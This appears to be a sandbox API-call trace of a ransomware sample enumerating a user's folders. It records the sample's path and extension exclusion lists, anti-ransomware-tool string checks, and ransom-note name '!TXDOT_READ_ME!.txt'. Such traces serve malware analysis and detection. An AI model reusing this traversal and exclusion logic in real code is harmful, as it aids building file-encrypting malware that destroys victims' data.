0x0 [0090.147] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.147] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0090.147] GetProcessHeap () returned 0xe30000 [0090.147] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xec75a0 [0090.147] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0090.147] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads\\*") returned="C:\\Users\\FD1HVy\\Downloads\\*" [0090.147] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec24f0 [0090.147] StrCmpW (psz1=".", psz2=".") returned 0 [0090.147] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.147] StrCmpW (psz1="..", psz2=".") returned 1 [0090.147] StrCmpW (psz1="..", psz2="..") returned 0 [0090.147] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.147] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.147] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.147] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.147] FindClose (in: hFindFile=0xec24f0 | out: hFindFile=0xec24f0) returned 1 [0090.147] GetProcessHeap () returned 0xe30000 [0090.147] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0090.147] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0090.147] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0090.147] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.147] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.147] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Favorites", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system32\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\local\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\boot\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\perflogs\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\programdata\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\drivers\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\wsus\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="crypt_detect") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="cryptolocker") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="ransomware") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\WINDOWS") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.148] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files") returned 0x0 [0090.148] GetProcessHeap () returned 0xe30000 [0090.148] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xec75a0 [0090.148] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0090.148] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\*") returned="C:\\Users\\FD1HVy\\Favorites\\*" [0090.148] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0090.148] StrCmpW (psz1=".", psz2=".") returned 0 [0090.148] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.149] StrCmpW (psz1="..", psz2=".") returned 1 [0090.149] StrCmpW (psz1="..", psz2="..") returned 0 [0090.149] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0090.149] StrCmpW (psz1="Bing.url", psz2=".") returned 1 [0090.149] StrCmpW (psz1="Bing.url", psz2="..") returned 1 [0090.149] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0090.149] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0090.149] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Bing.url", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Bing.url") returned="C:\\Users\\FD1HVy\\Favorites\\Bing.url" [0090.149] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0090.149] StrCmpW (psz1=".url", psz2=".txd0t") returned 1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="bootsect.bak") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="iconcache.db") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="thumbs.db") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2=" ransomware ") returned 1 [0090.149] StrCmpIW (psz1="Bing.url", psz2=" ransom ") returned 1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="debug.txt") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="boot.ini") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="desktop.ini") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="autorun.inf") returned 1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="ntuser.dat") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="ntldr") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="ntdetect.com") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="bootfont.bin") returned -1 [0090.149] StrCmpIW (psz1="Bing.url", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.149] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0090.149] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".url") returned=".url|.mui" [0090.149] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.149] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.149] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.149] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0090.149] StrCmpW (psz1="Links", psz2=".") returned 1 [0090.149] StrCmpW (psz1="Links", psz2="..") returned 1 [0090.149] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0090.149] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0090.150] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Links", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\boot\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\programdata\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\drivers\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\wsus\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="crypt_detect") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="cryptolocker") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="ransomware") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.150] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files") returned 0x0 [0090.150] GetProcessHeap () returned 0xe30000 [0090.150] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xec7a60 [0090.150] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Favorites\\Links", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0090.150] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\Links", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links\\*") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\*" [0090.150] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0090.150] StrCmpW (psz1=".", psz2=".") returned 0 [0090.150] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.151] StrCmpW (psz1="..", psz2=".") returned 1 [0090.151] StrCmpW (psz1="..", psz2="..") returned 0 [0090.151] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.151] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.151] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.151] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.151] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0090.151] GetProcessHeap () returned 0xe30000 [0090.151] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a60 | out: hHeap=0xe30000) returned 1 [0090.151] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0090.151] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0090.151] GetProcessHeap () returned 0xe30000 [0090.151] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.151] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0090.151] StrCmpW (psz1="Links", psz2=".") returned 1 [0090.151] StrCmpW (psz1="Links", psz2="..") returned 1 [0090.151] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.151] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.151] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Links", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.151] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\boot\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\programdata\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\drivers\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\wsus\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="crypt_detect") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="cryptolocker") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="ransomware") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.152] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files") returned 0x0 [0090.152] GetProcessHeap () returned 0xe30000 [0090.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xec75a0 [0090.152] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0090.152] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\*") returned="C:\\Users\\FD1HVy\\Links\\*" [0090.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0090.152] StrCmpW (psz1=".", psz2=".") returned 0 [0090.152] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.152] StrCmpW (psz1="..", psz2=".") returned 1 [0090.152] StrCmpW (psz1="..", psz2="..") returned 0 [0090.152] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcee4480b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.152] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.152] 